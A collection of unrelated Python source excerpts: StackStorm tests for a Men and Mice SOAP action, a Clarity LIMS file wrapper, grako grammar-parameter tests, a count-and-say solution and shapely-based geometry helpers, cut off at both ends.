worksheet.write_formula(row, col + 3, '=+SUM(' + rangoSuma + ')', tipoFila)
row += 1
workbook.close()
|
from men_and_mice_base_action_test_case import MenAndMiceBaseActionTestCase
from run_operation import RunOperation
from run_operation import CONFIG_CONNECTION_KEYS
from st2common.runners.base_action import Action
import copy
import mock
import zeep
import logging
class TestActionRunOperation(MenAndMiceBaseActionTestCase):
__test__ = True
action_cls = RunOperation
def test_init(self):
action = self.get_action_instance({})
self.assertIsInstance(action, RunOperation)
self.assertIsInstance(action, Action)
def test_snake_to_camel(self):
action = self.get_action_instance({})
snake = "snake_case_string"
camel = "snakeCaseString"
result = action.snake_to_camel(snake)
self.assertEqual(result, camel)
def test_snake_to_camel_exclude_dhcp(self):
action = self.get_action_instance({})
snake = "exclude_dhcp"
camel = "excludeDHCP"
result = action.snake_to_camel(snake)
self.assertEqual(result, camel)
def test_resolve_connection_from_config(self):
action = self.get_action_instance(self.config_good)
connection_name = 'full'
connection_config = self.config_good['menandmice'][connection_name]
connection_expected = {'connection': connection_name}
connection_expected.update(connection_config)
kwargs_dict = {'connection': connection_name}
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
def test_resolve_connection_from_config_missing(self):
action = self.get_action_instance(self.config_good)
connection_name = 'this_connection_doesnt_exist'
kwargs_dict = {'connection': connection_name}
with self.assertRaises(KeyError):
action.resolve_connection(kwargs_dict)
def test_resolve_connection_from_config_defaults(self):
action = self.get_action_instance(self.config_good)
connection_name = 'base'
connection_config = self.config_good['menandmice'][connection_name]
connection_expected = {'connection': connection_name}
connection_expected.update(connection_config)
for key, required, default in CONFIG_CONNECTION_KEYS:
if not required and default:
connection_expected[key] = default
kwargs_dict = {'connection': connection_name}
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(connection_result['transport'], 'https')
def test_resolve_connection_from_kwargs(self):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password',
'port': 123,
'transport': 'abc123',
'wsdl_endpoint': 'xxx?wsdl'}
connection_expected = copy.deepcopy(kwargs_dict)
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(kwargs_dict, {})
def test_resolve_connection_from_kwargs_defaults(self):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password'}
connection_expected = copy.deepcopy(kwargs_dict)
for key, required, default in CONFIG_CONNECTION_KEYS:
if not required and default:
connection_expected[key] = default
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(connection_result['transport'], 'https')
self.assertEqual(kwargs_dict, {})
def test_resolve_connection_from_kwargs_extras(self):
action = self.get_action_instance(self.config_blank)
connection_expected = {'connection': None,
'server': 'kwargs_server',
'username': 'kwargs_username',
'password': 'kwargs_password',
'port': 123,
'transport': 'abc123',
'wsdl_endpoint': 'xxx?wsdl'}
kwargs_dict = copy.deepcopy(connection_expected)
kwargs_extras = {"extra_key1": "extra_value1",
"extra_key2": 234}
kwargs_dict.update(kwargs_extras)
connection_result = action.resolve_connection(kwargs_dict)
self.assertEqual(connection_result, connection_expected)
self.assertEqual(kwargs_dict, kwargs_extras)
def test_validate_connection(self):
action = self.get_action_instance(self.config_blank)
connection = {}
for key, required, default in CONFIG_CONNECTION_KEYS:
if required:
connection[key] = "value_for_key_{}".format(key)
result = action.validate_connection(connection)
self.assertTrue(result)
def test_validate_connection_missing_raises(self):
action = self.get_action_instance(self.config_blank)
connection = {}
with self.assertRaises(KeyError):
action.validate_connection(connection)
def test_validate_connection_none_raises(self):
action = self.get_action_instance(self.config_blank)
connection = {}
for key, required, default in CONFIG_CONNECTION_KEYS:
connection[key] = None
with self.assertRaises(KeyError):
action.validate_connection(connection)
def test_build_wsdl_url(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'server': 'menandmice.domain.tld',
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
expected_url = ("{0}://{1}/{2}?server=localhost".
format(connection['transport'],
connection['server'],
connection['wsdl_endpoint']))
wsdl_url = action.build_wsdl_url(connection)
self.assertEquals(wsdl_url, expected_url)
def test_build_wsdl_url_port(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'server': 'menandmice.domain.tld',
'port': 8443,
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
expected_url = ("{0}://{1}:{2}/{3}?server=localhost".
format(connection['transport'],
connection['server'],
connection['port'],
connection['wsdl_endpoint']))
wsdl_url = action.build_wsdl_url(connection)
self.assertEquals(wsdl_url, expected_url)
def test_build_wsdl_url_missing_server(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'port': 8443,
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
with self.assertRaises(RuntimeError):
action.build_wsdl_url(connection)
def test_login(self):
action = self.get_action_instance(self.config_good)
connection_name = 'base'
connection = self.config_good['menandmice'][connection_name]
expected_session = "expected_session"
mock_client = mock.Mock()
mock_client.service.Login.return_value = expected_session
result = action.login(mock_client, connection)
mock_client.service.Login.assert_called_with(server=connection['server'],
loginName=connection['username'],
password=connection['password'])
self.assertEquals(result, expected_session)
@mock.patch('run_operation.zeep.Client')
def test__pre_exec_kwargs(self, mock_client):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'operation': 'GetDNSViews',
'session': 'abc123',
'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass',
'transport': 'http'}
kwargs_dict_extras = {'arg1': 'value1',
'arg2': 'value2'}
kwargs_dict.update(kwargs_dict_extras)
wsdl_url = ("http://{0}/_mmwebext/mmwebext.dll?wsdl?server=localhost"
.format(kwargs_dict['server']))
mock_client.return_value = 'mock client'
expected_context = {'kwargs_dict': kwargs_dict_extras,
'operation': kwargs_dict['operation'],
'session': kwargs_dict['session'],
'connection': {'connection': None,
'server': kwargs_dict['server'],
'username': kwargs_dict['username'],
'password': kwargs_dict['password'],
'transport': 'http',
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'},
'wsdl_url': wsdl_url}
kwargs_dict_copy = copy.deepcopy(kwargs_dict)
result_context, result_client = action._pre_exec(**kwargs_dict_copy)
mock_client.assert_called_with(wsdl=wsdl_url)
self.assertEquals(result_client, mock_client.return_value)
self.assertEquals(result_context, expected_context)
@mock.patch('run_operation.zeep.Client')
@mock.patch('run_operation.zeep.transports.Transport')
def test__pre_exec_config(self, mock_transport, mock_client):
action = self.get_action_instance(self.config_good)
connection_name = 'full'
kwargs_dict = {'operation': 'GetDNSViews',
'session': None,
'connection': connection_name}
connection = self.config_good['menandmice'][connection_name]
kwargs_dict.update(connection)
connection['connection'] = connection_name
kwargs_dict_extras = {'arg1': 'value1',
'arg2': 'value2'}
kwargs_dict.update(kwargs_dict_extras)
wsdl_url = ("{0}://{1}:{2}/_mmwebext/mmwebext.dll?wsdl?server=localhost"
.format(kwargs_dict['transport'],
kwargs_dict['server'],
kwargs_dict['port']))
mock_client.return_value = 'mock client'
expected_context = {'kwargs_dict': kwargs_dict_extras,
'operation': kwargs_dict['operation'],
'session': kwargs_dict['session'],
'connection': connection,
'wsdl_url': wsdl_url}
kwargs_dict_copy = copy.deepcopy(kwargs_dict)
result_context, result_client = action._pre_exec(**kwargs_dict_copy)
mock_client.assert_called_with(transport=mock_transport.return_value, wsdl=wsdl_url)
self.assertEquals(result_client, mock_client.return_value)
self.assertEquals(result_context, expected_context)
def test__exec_session(self):
action = self.get_action_instance(self.config_blank)
expected_args = {'paramOneValue': 'value1',
'paramTwoValue': 'value2'}
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': 'abc123',
'connection': {'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass'}}
expected_result = "abc"
mock_operation = mock.Mock()
mock_operation.return_value = expected_result
mock_client = mock.MagicMock()
mock_client.service.Login.return_value = False
mock_client.service.__getitem__.return_value = mock_operation
result = action._exec(context, mock_client)
self.assertFalse(mock_client.service.Login.called)
mock_client.service.__getitem__.assert_called_with(context['operation'])
mock_operation.assert_called_with(session=context['session'],
**expected_args)
self.assertEquals(result, expected_result)
def test__exec_login(self):
action = self.get_action_instance(self.config_blank)
expected_args = {'paramOneValue': 'value1',
'paramTwoValue': 'value2'}
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': None,
'connection': {'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass'}}
expected_result = "abc"
expected_session = "abc123"
mock_operation = mock.Mock()
mock_operation.return_value = expected_result
mock_client = mock.MagicMock()
mock_client.service.Login.return_value = expected_session
mock_client.service.__getitem__.return_value = mock_operation
result = action._exec(context, mock_client)
mock_client.service.Login.assert_called_with(server=context['connection']['server'],
loginName=context['connection']['username'],
password=context['connection']['password'])
mock_client.service.__getitem__.assert_called_with(context['operation'])
mock_operation.assert_called_with(session=expected_session,
**expected_args)
self.assertEquals(result, expected_result)
def test__exec_login_bad_connection(self):
action = self.get_action_instance(self.config_blank)
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': None,
'connection': {'server': 'menandmice.domain.tld'}}
mock_client = mock.Mock()
with self.assertRaises(KeyError):
action._exec(context, mock_client)
def test__post_exec(self):
logging.disable(logging.CRITICAL)
action = self.get_action_instance(self.config_blank)
client = zeep.Client(wsdl="./etc/menandmice_wsdl_2017_06_26.xml")
expected = {"adForest": [{"ref": "abc123",
"name": "forest_name",
"catalogServer": None,
"password": None,
"readOnly": None,
"userName": None}]}
type_class = client.get_type('ns0:ArrayOfADForest')
obj = type_class(adForest=[{'ref': expected['adForest'][0]['ref'],
'name': expected['adForest'][0]['name']}])
result = action._post_exec(obj)
self.assertEquals(result, expected)
@mock.patch("run_operation.RunOperation._post_exec")
@mock.patch("run_operation.RunOperation._exec")
@mock.patch("run_operation.RunOperation._pre_exec")
def test_run(self, mock__pre_exec, mock__exec, mock__post_exec):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'username': 'user',
'password': 'pass'}
context = "context"
client = "client"
exec_result = "exec result"
post_exec_result = "post exec result"
mock__pre_exec.return_value = (context, client)
mock__exec.return_value = exec_result
mock__post_exec.return_value = post_exec_result
result = action.run(**kwargs_dict)
mock__pre_exec.assert_called_with(**kwargs_dict)
mock__exec.assert_called_with(context, client)
mock__post_exec.assert_called_with(exec_result)
self.assertEquals(result, post_exec_result)
|
# Copyright 2016 Semaphore Solutions, Inc.
# ---------------------------------------------------------------------------
from ._internal import ClarityElement
from six import BytesIO, StringIO, string_types
import logging
import os
from . import ETree
from ._internal.props import subnode_property
from .exception import FileNotFoundException
from s4.clarity import types
log = logging.getLogger(__name__)
class File(ClarityElement):
"""
This is a file in Clarity. It is also a Python file (more or less).
You can read, write, and do everything else you can normally do with a Python file.
NOTE: nothing will be committed to Clarity until you call close, or commit.
"""
UNIVERSAL_TAG = "{http://genologics.com/ri/file}file"
def __init__(self, lims, uri=None, xml_root=None, name=None, limsid=None):
super(File, self).__init__(lims, uri, xml_root, name, limsid)
self._data = None
self._dirty = False
self.content_type = 'text/plain'
self.writeable = True
self.only_write_locally = False
self.mode = "r"
@classmethod
def new_empty(cls, attachment_point_element, name=None):
"""
Create a new empty :class:`File`.
:param attachment_point_element: An element to attach the file to.
:type attachment_point_element: ClarityElement
:param name: A name for the file.
:type name: str
:rtype: File
"""
root = ETree.Element(cls.UNIVERSAL_TAG)
f = File(uri=None, xml_root=root, lims=attachment_point_element.lims)
if name is not None:
f.name = name
f.attached_to = attachment_point_element.uri
return f
@classmethod
def new_from_local(cls, attachment_point_element, local_file_path, mode="r+b"):
"""
Create a new :class:`File` from a local file.
:param attachment_point_element: An element to attach the file to.
:type attachment_point_element: ClarityElement
:param local_file_path: Path to the local file.
:type local_file_path: str
:param mode: Mode to open the file with.
:type mode: str
:rtype: File
"""
root = ETree.Element(cls.UNIVERSAL_TAG)
f = File(uri=None, xml_root=root, lims=attachment_point_element.lims)
f.name = local_file_path
f.attached_to = attachment_point_element.uri
f._data = open(local_file_path, mode)
f._dirty = True
return f
name = subnode_property('original-location')
attached_to = subnode_property('attached-to')
content_location = subnode_property('content-location')
is_published = subnode_property('is-published', typename=types.BOOLEAN)
@property
def is_binary_mode(self):
"""
:type: bool
"""
return "b" in self.mode
def pipe_to(self, target_file_object):
"""
:raises FileNotFoundException: if the file does not exist in Clarity.
"""
response = self.lims.raw_request('GET', self.uri + '/download')
self.content_type = response.headers.get("Content-Type")
if self.is_binary_mode:
file_contents = response.content
else:
file_contents = response.content if isinstance(response.content, string_types) else response.text
target_file_object.write(file_contents)
def replace_and_commit_from_local(self, local_file_path, content_type='text/plain', mode="r+b"):
self.mode = mode
other_file = open(local_file_path, self.mode)
self.replace_and_commit(other_file, local_file_path, content_type)
other_file.close()
def replace_and_commit(self, stream, name, content_type='text/plain'):
if not self.writeable:
raise Exception("file not writeable")
self.name = name
self.data.write(stream.read())
self.content_type = content_type
self._dirty = True
self.commit()
@property
def data(self):
"""
:return: The file data IO stream.
:rtype: io.IOBase
"""
if self._data is None:
if self.only_write_locally:
pathstrippedname = os.path.basename(self.name)
if os.path.exists(self.name):
file_name = self.name
else:
file_name = pathstrippedname
self._data = open(file_name, self.mode)
else:
self._data = BytesIO() if self.is_binary_mode else StringIO()
if self.uri is not None:
try:
log.debug("Getting file contents from lims...")
# convenient!
self.pipe_to(self._data)
self._data.seek(0)
except FileNotFoundException:
log.debug("File not found at %s" % self.uri)
# this is ok, we just leave the buffer empty.
# uri = None means we will need a new uri, later, allocated through glsstorage.
self.uri = None
return self._data
# Implementation for standard io.IOBase methods to support being used as a file:
def read(self, n=-1):
return self.data.read(n)
def readline(self, length=None):
return self.data.readline(length)
def readlines(self, sizehint=0):
return self.data.readlines(sizehint)
def write(self, s):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
return self.data.write(s)
def writelines(self, iterable):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
return self.data.writelines(iterable)
def flush(self):
# don't do anything at all
return
def getvalue(self):
return self.data.getvalue()
def truncate(self, size=None):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
if size is None and self._data is None:
self._data = BytesIO() if self.is_binary_mode else StringIO()
else:
self._data.truncate(size)
def tell(self):
return self.data.tell()
def isatty(self):
return False
def close(self):
"""
Commit the file and close the data stream.
"""
self.commit()
return self.data.close()
def __iter__(self):
return self.data.__iter__()
def seek(self, pos, mode=0):
return self.data.seek(pos, mode)
def readable(self):
return self.data.readable()
def writable(self):
return self.data.writable()
def seekable(self):
return self.data.seekable()
# end file-like functions
def seek_to_end(self):
return self.data.seek(0, 2)
def commit(self):
if not self.writeable or self._data is None:
return
if self.only_write_locally:
self._data.flush()
return
if self.name is None:
raise Exception("Value for .name required.")
if self.uri is not None:
# If we are overwriting an existing file, first delete to
# allow name to be changed.
self.lims.raw_request('DELETE', self.uri)
self.uri = None
# first we get an allocation from glsstorage
self.post_and_parse(self.lims.root_uri + '/glsstorage')
# then we post ourselves to files, which gives us a uri.
self.post_and_parse(self.lims.root_uri + '/files')
if self._dirty:
old_pos = self.data.tell()
self.data.seek(0)
self.lims.raw_request('POST', self.uri + '/upload',
files={'file': (self.name, self.data, self.content_type)}
)
self._dirty = False
self.data.seek(old_pos)
|
__all__ = [
"ATOMIC_RADII",
"KHOT_EMBEDDINGS",
"CONTINUOUS_EMBEDDINGS",
"MAX_ATOMIC_NUM",
]
from .atomic_radii import ATOMIC_RADII
from .continuous_embeddings import CONTINUOUS_EMBEDDINGS
from .khot_embeddings import KHOT_EMBEDDINGS
MAX_ATOMIC_NUM = 100
|
class Solution:
def nth(self, n: int, verbose=False):
if n == 1:
return "1"
if n == 2:
return "11"
s = "11"
for i in range(3, n + 1):
if verbose:
print(s)
s += "$"
l = len(s)
cnt = 1
tmp = ""
for j in range(1, l):
if s[j] != s[j - 1]:
tmp += str(cnt + 0)
tmp += s[j - 1]
cnt = 1
else:
cnt += 1
s = tmp
return s
print(Solution().nth(6))
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by Juancarlo Añez
# Copyright (C) 2012-2016 by Juancarlo Añez and Thomas Bragg
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from grako.parser import GrammarGenerator
from grako.tool import compile
from grako.util import trim, ustr, PY3
from grako.codegen import codegen
class ParameterTests(unittest.TestCase):
def test_keyword_params(self):
grammar = '''
start(k1=1, k2=2)
=
{'a'} $
;
'''
g = GrammarGenerator('Keywords')
model = g.parse(grammar, trace=False)
code = codegen(model)
self.assertEqual('#!/usr/bin/env python', code.splitlines()[0])
pass
def test_35_only_keyword_params(self):
grammar = '''
rule(kwdA=A, kwdB=B)
=
'a'
;
'''
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
def test_36_params_and_keyword_params(self):
grammar = '''
rule(A, kwdB=B)
=
'a'
;
'''
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
def test_36_param_combinations(self):
def assert_equal(target, value):
self.assertEqual(target, value)
class TC36Semantics(object):
"""Check all rule parameters for expected types and values"""
def rule_positional(self, ast, p1, p2, p3, p4):
assert_equal("ABC", p1)
assert_equal(123, p2)
assert_equal('=', p3)
assert_equal("+", p4)
return ast
def rule_keyword(self, ast, k1, k2, k3, k4):
assert_equal("ABC", k1)
assert_equal(123, k2)
assert_equal('=', k3)
assert_equal('+', k4)
return ast
def rule_all(self, ast, p1, p2, p3, p4, k1, k2, k3, k4):
assert_equal("DEF", p1)
assert_equal(456, p2)
assert_equal('=', p3)
assert_equal("+", p4)
assert_equal("HIJ", k1)
assert_equal(789, k2)
assert_equal('=', k3)
assert_equal('+', k4)
return ast
grammar = '''
@@ignorecase::False
@@nameguard
start
= {rule_positional | rule_keywords | rule_all} $ ;
rule_positional('ABC', 123, '=', '+')
= 'a' ;
rule_keywords(k1=ABC, k3='=', k4='+', k2=123)
= 'b' ;
rule_all('DEF', 456, '=', '+', k1=HIJ, k3='=', k4='+', k2=789)
= 'c' ;
'''
pretty = '''
@@ignorecase :: False
@@nameguard :: True
start
=
{rule_positional | rule_keywords | rule_all} $
;
rule_positional(ABC, 123, '=', '+')
=
'a'
;
rule_keywords(k1=ABC, k3='=', k4='+', k2=123)
=
'b'
;
rule_all(DEF, 456, '=', '+', k1=HIJ, k3='=', k4='+', k2=789)
=
'c'
;
'''
model = compile(grammar, 'RuleArguments')
self.assertEqual(trim(pretty), ustr(model))
model = compile(pretty, 'RuleArguments')
ast = model.parse("a b c")
self.assertEqual(['a', 'b', 'c'], ast)
semantics = TC36Semantics()
ast = model.parse("a b c", semantics=semantics)
self.assertEqual(['a', 'b', 'c'], ast)
codegen(model)
def test_36_unichars(self):
grammar = '''
start = { rule_positional | rule_keywords | rule_all }* $ ;
rule_positional("ÄÖÜäöüß") = 'a' ;
rule_keywords(k1='äöüÄÖÜß') = 'b' ;
rule_all('ßÄÖÜäöü', k1="ßäöüÄÖÜ") = 'c' ;
'''
def _trydelete(pymodule):
import os
try:
os.unlink(pymodule + ".py")
except EnvironmentError:
pass
try:
os.unlink(pymodule + ".pyc")
except EnvironmentError:
pass
try:
os.unlink(pymodule + ".pyo")
except EnvironmentError:
pass
def assert_equal(target, value):
self.assertEqual(target, value)
class UnicharsSemantics(object):
"""Check all rule parameters for expected types and values"""
def rule_positional(self, ast, p1):
assert_equal("ÄÖÜäöüß", p1)
return ast
def rule_keyword(self, ast, k1):
assert_equal("äöüÄÖÜß", k1)
return ast
def rule_all(self, ast, p1, k1):
assert_equal("ßÄÖÜäöü", p1)
assert_equal("ßäöüÄÖÜ", k1)
return ast
m = compile(grammar, "UnicodeRuleArguments")
ast = m.parse("a b c")
self.assertEqual(['a', 'b', 'c'], ast)
semantics = UnicharsSemantics()
ast = m.parse("a b c", semantics=semantics)
self.assertEqual(['a', 'b', 'c'], ast)
code = codegen(m)
import codecs
with codecs.open("tc36unicharstest.py", "w", "utf-8") as f:
f.write(code)
import tc36unicharstest
tc36unicharstest
_trydelete("tc36unicharstest")
def test_numbers_and_unicode(self):
grammar = '''
rúle(1, -23, 4.56, 7.89e-11, 0xABCDEF, Añez)
=
'a'
;
'''
rule2 = '''
rulé::Añez
=
'\\xf1'
;
'''
rule3 = '''
rúlé::Añez
=
'ñ'
;
'''
if PY3:
grammar += rule3
else:
grammar += rule2
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
|
"""
geometry
~~~~~~~~
Methods to help with geometry work. Uses `shapely`.
"""
import numpy as _np
import math as _math
from . import data as _data
import logging as _logging
# For what we use this for, we could use e.g binary search; but why re-invent
# the wheel?
import scipy.optimize as _optimize
_logger = _logging.getLogger(__name__)
try:
import shapely.geometry as _geometry
except Exception:
_logger.error("Failed to import `shapely`.")
_geometry = None
def configure_gdal():
"""On windows, I have found that by default, the GDAL_DATA environment
variable is not set. One solution is to always use the (for example)
Anaconda Prompt instead of the usual Command Prompt. Another is to
correctly set the variable programmatically, which is what this function
does. You can tell if this is a problem by noticing the message:
> ERROR 4: Unable to open EPSG support file gcs.csv.
> Try setting the GDAL_DATA environment variable to point to the
> directory containing EPSG csv files.
Appearing on stderr when you use e.g. geopandas.
"""
import os, sys
if "GDAL_DATA" in os.environ:
_logger.debug("GDAL_DATA already set so nothing to do.")
return
_logger.info("GDAL_DATA not set, so searching...")
if sys.platform.startswith("linux"):
_logger.info("However, platform is linux, so assuming we'll be okay...")
return
choices = _find_gdal_choices()
if len(choices) == 1:
_logger.info("Set GDAL_DATA = '%s'", choices[0])
os.environ["GDAL_DATA"] = choices[0]
else:
_logger.error("Found too many choices for setting GDAL_DATA: %s", str(choices))
def _find_gdal_choices():
import os, sys
choices = []
for path, _, _ in os.walk(sys.exec_prefix):
if path.endswith("gdal"):
choices.append(path)
library_choices = [x for x in choices if x.lower().find("library") > -1
and x.lower().find("pkgs") == -1 and _contains_csv(x)]
if len(library_choices) == 1:
return library_choices
return choices
def _contains_csv(path):
import os
csvs = [x for x in os.listdir(path) if x.endswith(".csv")]
return len(csvs) > 1
def grid_intersection(geometry, grid):
"""Find the collection of grid cells which intersect with the geometry.
Here "intersect" means "intersects with non-zero area", so grid cells just
touching the geometry will not be returned.
:param geometry: Geometry object to intersect with.
:param grid: Instance of :class:`Grid` describing the grid.
:return: List of pairs (x,y) of grid cells which intersect.
"""
minx, miny, maxx, maxy = geometry.bounds
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
intersections = []
for y in range(ystart, yend + 1):
yy = grid.yoffset + y * grid.ysize
for x in range(xstart, xend + 1):
xx = grid.xoffset + x * grid.xsize
poly = _geometry.Polygon([[xx, yy], [xx + grid.xsize, yy],
[xx + grid.xsize, yy + grid.ysize], [xx, yy + grid.ysize]])
poly = poly.intersection(geometry)
if not poly.is_empty and poly.area > 0:
intersections.append((x, y))
return intersections
def mask_grid_by_intersection(geometry, grid):
"""Generate a :class:`MaskedGrid` by intersecting the grid with the
geometry. The returned grid may have a different x/y offset, so that it
can contain all grid cells which intersect with the geometry. However,
the "relative offset" will be unchanged (so that the difference between the
x offsets will be a multiple of the grid width, and the same for y).
:param geometry: Geometry object to intersect with.
:param grid: The :class:`Grid` instance describing the grid.
"""
minx, miny, maxx, maxy = geometry.bounds
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
width = xend - xstart + 1
height = yend - ystart + 1
mask = _np.empty((height, width), dtype=_np.bool)
xo = grid.xoffset + xstart * grid.xsize
yo = grid.yoffset + ystart * grid.ysize
import shapely.prepared
geo = shapely.prepared.prep(geometry)
for y in range(height):
yy = yo + y * grid.ysize
polys = [_geometry.Polygon([[xo + x * grid.xsize, yy],
[xo + x * grid.xsize + grid.xsize, yy],
[xo + x * grid.xsize + grid.xsize, yy + grid.ysize],
[xo + x * grid.xsize, yy + grid.ysize]])
for x in range(width)]
mask[y] = _np.asarray([not geo.intersects(poly) for poly in polys])
return _data.MaskedGrid(grid.xsize, grid.ysize, xo, yo, mask)
def mask_grid_by_points_intersection(timed_points, grid, bbox=False):
"""Generate a :class:`MaskedGrid` by intersecting the grid with collection
of points.
:param timed_points: Instance of :class:`TimedPoints` (or other object with
`xcoords` and `ycoords` attributes).
:param grid: The :class:`Grid` instance describing the grid.
:param bbox: If `True` then return the smallest rectangle containing the
points. If `False` then just return the grid cells which contain at
least once point.
"""
xcs = _np.asarray(timed_points.xcoords)
ycs = _np.asarray(timed_points.ycoords)
minx, maxx = _np.min(xcs), _np.max(xcs)
miny, maxy = _np.min(ycs), _np.max(ycs)
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
width = xend - xstart + 1
height = yend - ystart + 1
mask = _np.zeros((height, width), dtype=_np.bool)
xo = grid.xoffset + xstart * grid.xsize
yo = grid.yoffset + ystart * grid.ysize
if not bbox:
def intersect(xx, yy):
mask = ( (xcs >= xx) & (ycs >= yy)
& (xcs <= (xx+grid.xsize)) & (ycs <= (yy+grid.ysize)) )
return _np.any(mask)
for y in range(height):
yy = yo + y * grid.ysize
for x in range(width):
xx = xo + x * grid.xsize
if not intersect(xx, yy):
mask[y][x] = True
return _data.MaskedGrid(grid.xsize, grid.ysize, xo, yo, mask)
def intersect_timed_points(timed_points, geo):
"""Intersect the :class:`TimedPoints` data with the geometry, using
`shapely`.
:param timed_points: Instance of :class:`TimedPoints`
:param geo: A geometry object
:return: Instance of :class:`TimedPoints`
"""
points = [ (x,y) for x,y in zip(timed_points.xcoords, timed_points.ycoords) ]
mp = _geometry.MultiPoint(points)
mp = mp.intersection(geo)
# type of mp: <class 'shapely.geometry.multipoint.MultiPoint'>
# type of np-asarray-mp: <class 'numpy.ndarray'>
# shape of np-asarray-mp: (23653, 2)
# type of pt in _np.asarray(mp): <class 'numpy.ndarray'>
# shape of pt in _np.asarray(mp): (2,)
# NOTE: The slicing "[:,:2]" in this next line was added because
# using some geojson files somehow resulted in points with 3
# dimensions here, immediately after the above "mp.intersection(geo)"
# line. Forcing the slice here to only take the first 2 dimensions
# is a workaround until that bug can be understood and fixed.
points_we_want = set(tuple(pt) for pt in _np.asarray(mp)[:,:2])
#points_we_want = set(tuple(pt) for pt in _np.asarray(mp))
mask = [pt in points_we_want for pt in points]
mask = _np.array(mask, dtype=_np.bool)
return timed_points[mask]
#############################################################################
# Point and line geometry
#############################################################################
def _project_point_to_line(point, line):
"""Assumes line is only 2 points
"""
v = line[1] - line[0]
x = point - line[0]
t = _np.dot(x, v) / _np.dot(v, v)
if t <= 0:
return line[0]
if t >= 1:
return line[1]
return line[0] + t * v
def project_point_to_line(point, line):
"""Find the closest point on the line segment to the point.
:param point: Pair `(x,y)`(
:param line: A single linear segment, `[ [x_1,y_1], [x_2,y_2], ...,
[x_n,y_n] ]`. This ordering is compatible with `shapely` (and not
compatible with our own code!)
"""
point = _np.asarray(point)
if len(point.shape) == 2:
if point.shape[0] != 1:
raise ValueError("Need a single point")
point = point[0]
if point.shape != (2,):
raise ValueError("Point should be (x,y)")
line = _np.asarray(line)
if len(line.shape) != 2 or line.shape[0] < 2 or line.shape[1] != 2:
raise ValueError("Line should be ((x_1,y_1), ..., (x_n,y_n))")
options = [ _project_point_to_line(point, line[i:i+2,:])
for i in range(line.shape[0] - 1) ]
if line.shape[0] == 2:
return options[0]
distsq = [_np.sum((point - opt)**2) for opt in options]
return options[_np.argmin(distsq)]
def project_point_to_lines(point, lines):
"""Find the closest point on one of the line segments to the point.
:param point: Pair `(x,y)`(
:param line: A list of linear segments (see :func:`project_point_to_line`).
"""
point = _np.asarray(point)
options = [project_point_to_line(point, line) for line in lines]
distsq = [_np.sum((point - opt)**2) for opt in options]
return options[_np.argmin(distsq)]
def project_point_to_lines_shapely(point, lines):
"""As :func:`project_point_to_lines` but uses `shapely` at a first pass.
:param point: Pair `(x,y)`
:param lines: A list of :class:`shapely.geometry.LineString` objects.
"""
pt = _geometry.Point(point)
dists = _np.asarray([line.distance(pt) for line in lines])
line = lines[dists.argmin()]
return project_point_to_line(point, line.coords)
def intersect_line_box(start, end, box_bounds):
"""Intersect a line with a rectangular box. The box is "half-open", so
only the top and left boundary edges are considered part of the box. If
the line only intersects the box in a point, we consider this a no
intersection.
:param start: Pair `(x,y)` of the start of the line segment
:param end: Pair `(x,y)` of the end of the line segment
:param box_bounds: `(xmin, ymin, xmax, ymax)` of the box. Formally, the
box is those `(x,y)` with `xmin <= x < xmax` and `ymin <= y < ymax`.
:return: `None` or `(t1, t2)` where `start * (1-t) + end * t` is
in the box for `t1 < t < t2`.
"""
dx, dy = end[0] - start[0], end[1] - start[1]
xmin, ymin, xmax, ymax = tuple(box_bounds)
if xmin >= xmax or ymin >= ymax:
raise ValueError("Not a valid box")
if _np.abs(dx) < 1e-10:
# Vertical line
if not ( xmin <= start[0] and start[0] < xmax ):
return None
if _np.abs(dy) < 1e-10:
# Must be point
if not ( ymin <= start[1] and start[1] < ymax ):
return None
return (0, 1)
else:
c, d = ymin - start[1], ymax - start[1]
